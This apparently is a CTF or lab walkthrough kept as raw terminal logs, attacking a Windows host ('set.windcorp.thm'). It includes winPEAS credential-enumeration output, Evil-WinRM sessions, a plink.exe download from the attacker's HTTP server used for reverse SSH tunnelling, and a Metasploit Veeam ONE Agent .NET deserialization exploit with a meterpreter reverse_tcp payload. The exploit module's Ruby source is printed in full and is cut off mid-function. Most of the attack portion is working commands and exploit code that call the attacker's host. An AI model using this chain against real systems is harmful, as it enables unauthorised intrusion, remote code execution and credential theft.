ÉÍÍÍÍÍÍÍÍÍ͹ Checking Windows Vault
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[ERROR] Unable to enumerate vaults. Error (0x1061)
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking Credential manager
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list
ÉÍÍÍÍÍÍÍÍÍ͹ Saved RDP connections
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Remote Desktop Server/Client Settings
RDP Server Settings
Network Level Authentication :
Block Clipboard Redirection :
Block COM Port Redirection :
Block Drive Redirection :
Block LPT Port Redirection :
Block PnP Device Redirection :
Block Printer Redirection :
Allow Smart Card Redirection :
RDP Client Settings
Disable Password Saving : True
Restricted Remote Administration : False
ÉÍÍÍÍÍÍÍÍÍ͹ Recently run commands
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Master Keys
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\MichelleWat\AppData\Roaming\Microsoft\Protect\S-1-5-21-2146754214-159084425-2869734154-2014\670e597a-66e1-4e6b-8ec9-ff9e51a7d92e
Accessed: 6/15/2020 11:12:07 AM
Modified: 6/15/2020 11:12:07 AM
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Credential Files
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for RDCMan Settings Files
È Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Kerberos tickets
È https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
[X] Exception: Object reference not set to an instance of an object.
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for saved Wifi credentials
[X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking AppCmd.exe
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
AppCmd.exe was found in C:\windows\system32\inetsrv\appcmd.exe
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Looking SSClient.exe
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#scclient-sccm
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating SSCM - System Center Configuration Manager settings
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Security Packages Credentials
[X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d5353500003000000010001005e000000000000005f000000000000005800000000000000580000000600060058000000000000005f000000058a80a20a0063450000000fd0d07d1eedade3358b1f3dbc7ca717cf53004500540000
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Firefox
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Firefox DBs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Firefox history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Chrome
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Chrome DBs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Chrome history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Chrome bookmarks
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Opera
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Brave Browser
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Internet Explorer (unsupported)
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Current IE tabs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
[X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
--- End of inner exception stack trace ---
at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
at fk.l()
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in IE history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
ÉÍÍÍÍÍÍÍÍÍ͹ IE favorites
http://go.microsoft.com/fwlink/p/?LinkId=255142
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Putty Sessions
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Putty SSH Host keys
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ SSH keys in registry
È If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ SuperPutty configuration files
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Office 365 endpoints synced by OneDrive.
SID: S-1-5-19
=================================================================================================
SID: S-1-5-20
=================================================================================================
SID: S-1-5-21-2146754214-159084425-2869734154-1001
=================================================================================================
SID: S-1-5-21-2146754214-159084425-2869734154-2014
=================================================================================================
SID: S-1-5-18
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Cloud Credentials
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Unattend Files
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for common SAM & SYSTEM backups
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for McAfee Sitelist.xml Files
ÉÍÍÍÍÍÍÍÍÍ͹ Cached GPP Passwords
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible regs with creds
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry
Not Found
Not Found
Not Found
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible password files in users homes
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
ÉÍÍÍÍÍÍÍÍÍ͹ Searching for Oracle SQL Developer config files
ÉÍÍÍÍÍÍÍÍÍ͹ Slack files & directories
note: check manually if something is found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for LOL Binaries and Scripts (can be slow)
È https://lolbas-project.github.io/
[!] Check skipped, if you want to run it, please specify '-lolbas' argument
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Outlook download files
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating machine and user certificate files
Issuer : CN=set.windcorp.thm
Subject : CN=set.windcorp.thm
ValidDate : 6/7/2020 8:00:22 AM
ExpiryDate : 10/7/2036 8:10:21 AM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 95714370BD9BCC8008EF7D1E0DFCBBC2251CE077
Enhanced Key Usages
Client Authentication [*] Certificate is used for client authentication!
Server Authentication
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Searching known files that can contain creds in home
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for documents --limit 100--
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Office Most Recent Files -- limit 50
Last Access Date User Application Document
ÉÍÍÍÍÍÍÍÍÍ͹ Recent files --limit 70--
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)
[X] Exception: Object reference not set to an instance of an object.
ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\MichelleWat\Desktop\winPEASany_ofs.exe": MichelleWat [AllAccess]
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Linux shells/distributions - wsl.exe, bash.exe
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ File Analysis ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Found SSH AGENTS Files
File: C:\Users\All Users\Veeam\OneAgent\Packages\Veeam.One.Agent.Package.Powershell.package
File: C:\Users\All Users\Veeam\OneAgent\Packages\Veeam.One.Agent.Package.LogAnalyzer.package
File: C:\Users\All Users\Veeam\OneAgent\Log\3be6b89b-e6de-4e97-bcd4-5c14e9d97fc1\OneAgent.log
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 988
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:2805 0.0.0.0:0 LISTENING 5060
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 764
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1064
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 788
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 1340
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 772
TCP 10.10.242.97:139 0.0.0.0:0 LISTENING 4
TCP 10.10.242.97:2805 10.10.242.97:49719 ESTABLISHED 5060
TCP 10.10.242.97:5985 10.8.19.103:53348 TIME_WAIT 0
TCP 10.10.242.97:5985 10.8.19.103:53364 ESTABLISHED 4
TCP 10.10.242.97:49719 10.10.242.97:2805 ESTABLISHED 5060
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> Get-Process -Id 5060
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
744 53 54720 74028 5060 0 Veeam.One.Agent.Service
Veeam One Agent Service es un servicio de Windows que forma parte de la solución de backup y recuperación de datos de Veeam. Su función es recopilar información sobre el estado de los servidores y dispositivos de almacenamiento en un entorno de TI y enviar esa información a Veeam ONE Server para su análisis. Esto permite a los administradores de TI monitorear el estado de sus servidores y dispositivos de almacenamiento y tomar medidas preventivas para evitar problemas de disponibilidad.
El servicio Veeam One Agent Service se inicia automáticamente cada vez que se inicia la computadora y se ejecuta en segundo plano, sin interferir con el rendimiento del sistema. Si necesitas detener el servicio, puedes hacerlo desde el Administrador de tareas de Windows o desde el panel de control de Veeam ONE.
https://www.veeam.com/
https://www.veeam.com/kb3144
https://www.rapid7.com/db/modules/exploit/windows/misc/veeam_one_agent_deserialization/
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> Get-ChildItem C:\ -recurse -ErrorAction SilentlyContinue | Where-Object {$_.Name -match "Veeam.One.Agent"}
Directory: C:\Program Files\Veeam\Veeam ONE
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/7/2020 7:57 AM Veeam ONE Agent
Directory: C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/18/2019 7:50 PM 453560 Veeam.One.Agent.Common.dll
-a---- 1/18/2019 7:50 PM 22968 Veeam.One.Agent.Configurator.PowerShell.dll
-a---- 1/18/2019 7:50 PM 57784 Veeam.One.Agent.Controller.PowerShell.dll
-a---- 1/18/2019 7:50 PM 89528 Veeam.One.Agent.Deployment.Common.dll
-a---- 1/18/2019 7:50 PM 445880 Veeam.One.Agent.Deployment.Service.exe
-a---- 1/18/2019 7:50 PM 311736 Veeam.One.Agent.Service.exe
-a---- 1/18/2019 7:50 PM 50616 Veeam.One.Agent.Updater.exe
Evil-WinRM* PS C:\Users\MichelleWat\Documents> Get-Item 'C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent\Veeam.One.Agent.Service.exe' | Format-List *
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent\Veeam.One.Agent.Service.exe
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent
PSChildName : Veeam.One.Agent.Service.exe
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
Mode : -a----
VersionInfo : File: C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent\Veeam.One.Agent.Service.exe
InternalName: Veeam.One.Agent.Service.exe
OriginalFilename: Veeam.One.Agent.Service.exe
FileVersion: 9.5.4.4566
FileDescription: OneAgent
Product: Veeam ONE Monitor
ProductVersion: 9.5.4.4566
Debug: False
Patched: False
PreRelease: False
PrivateBuild: False
SpecialBuild: False
Language: Language Neutral
BaseName : Veeam.One.Agent.Service
Target : {}
LinkType :
Name : Veeam.One.Agent.Service.exe
Length : 311736
DirectoryName : C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent
Directory : C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent
IsReadOnly : False
Exists : True
FullName : C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent\Veeam.One.Agent.Service.exe
Extension : .exe
CreationTime : 1/18/2019 7:50:50 PM
CreationTimeUtc : 1/19/2019 3:50:50 AM
LastAccessTime : 6/7/2020 7:57:03 AM
LastAccessTimeUtc : 6/7/2020 2:57:03 PM
LastWriteTime : 1/18/2019 7:50:50 PM
LastWriteTimeUtc : 1/19/2019 3:50:50 AM
Attributes : Archive
ProductVersion: 9.5.4.456
The port 2805 was inaccessible from the outside world. I had to get access to the port from the attacker’s machine.
https://informationsecurity.medium.com/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
download (64-bit x86)
┌──(kali㉿kali)-[~/Downloads]
└─$ cp plink.exe ../Set
┌──(kali㉿kali)-[~/Downloads]
└─$ cd ../Set
┌──(kali㉿kali)-[~/Set]
└─$ ls
CVE-2021-1675.ps1 hook.lnk Info.txt users_final.txt winPEASany_ofs.exe
hash_michelle hook.zip plink.exe users.xml
┌──(kali㉿kali)-[~/Set]
└─$ chmod +x plink.exe
┌──(kali㉿kali)-[~/Set]
└─$ python3 -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
10.10.242.97 - - [02/Jan/2023 14:35:08] "GET /plink.exe HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> Invoke-WebRequest -Uri http://10.8.19.103:1337/plink.exe -outfile plink.exe
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> ls
Directory: C:\Users\MichelleWat\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/2/2023 11:35 AM 986928 plink.exe
┌──(kali㉿kali)-[~/Set]
└─$ sudo service ssh start
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> echo y|& ./plink.exe -l kali -pw kali -N -R 2805:127.0.0.1:280
5 10.8.19.103
plink.exe : Using username "kali".
+ CategoryInfo : NotSpecified: (Using username "kali".:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
┌──(kali㉿kali)-[~/Set]
└─$ nmap -p2805 localhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-02 15:10 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0016s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
2805/tcp open wta-wsp-s
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
metasploit
┌──(kali㉿kali)-[~/Set]
└─$ msfconsole -q
msf6 > searchsploit veeam
[*] exec: searchsploit veeam
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery | ashx/webapps/46765.txt
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting | ashx/webapps/46766.txt
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit W | ashx/webapps/46767.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
msf6 > search veeam
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/veeam_one_agent_deserialization 2020-04-15 normal Yes Veeam ONE Agent .NET Deserialization
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/veeam_one_agent_deserialization
msf6 > use 0
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > show options
Module options (exploit/windows/misc/veeam_one_agent_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by server!)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
RPORT 2805 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be
an address on the local machine or 0.0.0.0 to listen on all add
resses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated
)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PowerShell Stager
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set SRVHOST 10.8.19.103
SRVHOST => 10.8.19.103
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set LHOST 10.8.19.103
LHOST => 10.8.19.103
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > run
[*] Started reverse TCP handler on 10.8.19.103:4444
[*] 127.0.0.1:2805 - Connecting to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Sending host info to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] 127.0.0.1:2805 - Sending malicious handshake to 127.0.0.1:2805
[*] Exploit completed, but no session was created.
https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/misc/veeam_one_agent_deserialization
ashh
Veeam ONE Agent .NET Deserialization es una vulnerabilidad de seguridad que afecta al servicio Veeam One Agent Service. Esta vulnerabilidad permite que un atacante remoto envíe datos maliciosos a través del servicio y ejecute código malintencionado en la máquina vulnerable.
Para explotar esta vulnerabilidad, el atacante debe enviar un paquete de datos malicioso a través del servicio Veeam One Agent Service utilizando técnicas de inyección de código. Una vez que el paquete de datos es recibido por el servicio, se deserializan y se ejecuta el código malintencionado incluido en el paquete.
Para evitar esta vulnerabilidad, es importante mantener el servicio Veeam One Agent Service y todas las aplicaciones relacionadas actualizadas con las últimas parches de seguridad. También es recomendable utilizar medidas de seguridad adicionales, como firewalls y sistemas de detección y prevención de intrusiones (IDS/IPS), para proteger la red contra ataques externos.
None of the 3 payloads in the module works, because Defender is killing them!
Here we can modify :)
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/auxiliary]
└─$ locate veeam_one_agent_deserialization
/usr/share/doc/metasploit-framework/modules/exploit/windows/misc/veeam_one_agent_deserialization.md
/usr/share/metasploit-framework/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/auxiliary]
└─$ cd /usr/share/metasploit-framework/modules/exploits/windows/misc/
┌──(kali㉿kali)-[/usr/…/modules/exploits/windows/misc]
└─$ ls
achat_bof.rb hp_magentservice.rb
actfax_raw_server_bof.rb hp_omniinet_1.rb
agentxpp_receive_agentx.rb hp_omniinet_2.rb
ahsay_backup_fileupload.rb hp_omniinet_3.rb
ais_esel_server_rce.rb hp_omniinet_4.rb
allmediaserver_bof.rb hp_operations_agent_coda_34.rb
altiris_ds_sqli.rb hp_operations_agent_coda_8c.rb
apple_quicktime_rtsp_response.rb hp_ovtrace.rb
asus_dpcproxy_overflow.rb hta_server.rb
avaya_winpmd_unihostrouter.rb ib_isc_attach_database.rb
avidphoneticindexer.rb ib_isc_create_database.rb
bakbone_netvault_heap.rb ibm_cognos_tm1admsd_bof.rb
bcaaa_bof.rb ibm_director_cim_dllinject.rb
bigant_server_250.rb ibm_tsm_cad_ping.rb
bigant_server_dupf_upload.rb ibm_tsm_rca_dicugetidentify.rb
bigant_server.rb ibm_websphere_java_deserialize.rb
bigant_server_sch_dupf_bof.rb ib_svc_attach.rb
bigant_server_usv.rb itunes_extm3u_bof.rb
bomberclone_overflow.rb landesk_aolnsrvr.rb
bopup_comm.rb lianja_db_net.rb
borland_interbase.rb manageengine_eventlog_analyzer_rce.rb
borland_starteam.rb mercury_phonebook.rb
citrix_streamprocess_data_msg.rb mini_stream.rb
citrix_streamprocess_get_boot_record_request.rb mirc_privmsg_server.rb
citrix_streamprocess_get_footer.rb mobile_mouse_rce.rb
citrix_streamprocess_get_objects.rb ms07_064_sami.rb
citrix_streamprocess.rb ms10_104_sharepoint.rb
cloudme_sync.rb netcat110_nt.rb
commvault_cmd_exec.rb nettransport.rb
crosschex_device_bof.rb nvidia_mental_ray.rb
cve_2022_28381_allmediaserver_bof.rb plugx.rb
disk_savvy_adm.rb poisonivy_21x_bof.rb
doubletake.rb poisonivy_bof.rb
eiqnetworks_esa.rb poppeeper_date.rb
eiqnetworks_esa_topology.rb poppeeper_uidl.rb
enterasys_netsight_syslog_bof.rb realtek_playlist.rb
eureka_mail_err.rb remote_control_collection_rce.rb
fb_cnct_group.rb remote_mouse_rce.rb
fb_isc_attach_database.rb sap_2005_license.rb
fb_isc_create_database.rb sap_netweaver_dispatcher.rb
fb_svc_attach.rb shixxnote_font.rb
gh0st.rb solidworks_workgroup_pdmwservice_file_write.rb
gimp_script_fu.rb splayer_content_type.rb
hp_dataprotector_cmd_exec.rb stream_down_bof.rb
hp_dataprotector_crs.rb talkative_response.rb
hp_dataprotector_dtbclslogin.rb tiny_identd_overflow.rb
hp_dataprotector_encrypted_comms.rb trendmicro_cmdprocessor_addtask.rb
hp_dataprotector_exec_bar.rb ufo_ai.rb
hp_dataprotector_install_service.rb unified_remote_rce.rb
hp_dataprotector_new_folder.rb veeam_one_agent_deserialization.rb
hp_dataprotector_traversal.rb vmhgfs_webdav_dll_sideload.rb
hp_imc_dbman_restartdb_unauth_rce.rb webdav_delivery.rb
hp_imc_dbman_restoredbase_unauth_rce.rb wifi_mouse_rce.rb
hp_imc_uam.rb windows_rsh.rb
hp_loadrunner_magentproc_cmdexec.rb wireshark_lua.rb
hp_loadrunner_magentproc.rb wireshark_packet_dect.rb
┌──(kali㉿kali)-[/usr/…/modules/exploits/windows/misc]
└─$ cat veeam_one_agent_deserialization.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Veeam ONE Agent .NET Deserialization',
'Description' => %q{
This module exploits a .NET deserialization vulnerability in the Veeam
ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the
9 and 10 release lines.
Specifically, the module targets the HandshakeResult() method used by
the Agent. By inducing a failure in the handshake, the Agent will
deserialize untrusted data.
Tested against the pre-patched release of 10.0.0.750. Note that Veeam
continues to distribute this version but with the patch pre-applied.
},
'Author' => [
'Michael Zanetta', # Discovery
'Edgar Boda-Majer', # Discovery
'wvu' # Module
],
'References' => [
['CVE', '2020-10914'],
['CVE', '2020-10915'], # This module
['ZDI', '20-545'],
['ZDI', '20-546'], # This module
['URL', 'https://www.veeam.com/kb3144']
],
'DisclosureDate' => '2020-04-15', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Windows Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
}
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'WfsDelay' => 10
},
'Notes' => {
'Stability' => [SERVICE_RESOURCE_LOSS], # Connection queue may fill?
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(2805),
OptString.new(
'HOSTINFO_NAME',
[
true,
'Name to send in host info (must be recognized by server!)',
'AgentController'
]
)
])
end
def check
vprint_status("Checking connection to #{peer}")
connect
CheckCode::Detected("Connected to #{peer}.")
rescue Rex::ConnectionError => e
CheckCode::Unknown("#{e.class}: #{e.message}")
ensure
disconnect
end
def exploit
print_status("Connecting to #{peer}")
connect
print_status("Sending host info to #{peer}")
sock.put(host_info(datastore['HOSTINFO_NAME']))
res = sock.get_once
vprint_good("<-- Host info reply: #{res.inspect}") if res
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
# TODO: Create an option to execute the full stager without hacking
# :linemax or calling execute_command(generate_cmdstager(...).join(...))
execute_cmdstager(
flavor: :psh_invokewebrequest, # NOTE: This requires PowerShell >= 3.0
linemax: 9001 # It's over 9000
)
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
rescue EOFError, Rex::ConnectionError => e
fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
ensure
disconnect
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
serialized_payload = Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TextFormattingRunProperties,
formatter: :BinaryFormatter # This is _exactly_ what we need
)
print_status("Sending malicious handshake to #{peer}")
sock.put(handshake(serialized_payload))
res = sock.get_once
vprint_good("<-- Handshake reply: #{res.inspect}") if res
rescue EOFError, Rex::ConnectionError => e
fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
end
def host_info(name)
meta = [0x0205].pack('v')
packed_name = [name.length].pack('C') + name
pkt = meta + packed_name
vprint_good("--> Host info packet: #{pkt.inspect}")
pkt
end
def handshake(serialized_payload)
# A -1 status indicates a failure, which will trigger the deserialization
status = [-1].pack('l<')
length = status.length + serialized_payload.length
type = 7
attrs = 1
kontext = 0
header = [length, type, attrs, kontext].pack('VvVV')
padding = "\x00" * 18
result = status + serialized_payload
pkt = header + padding + result
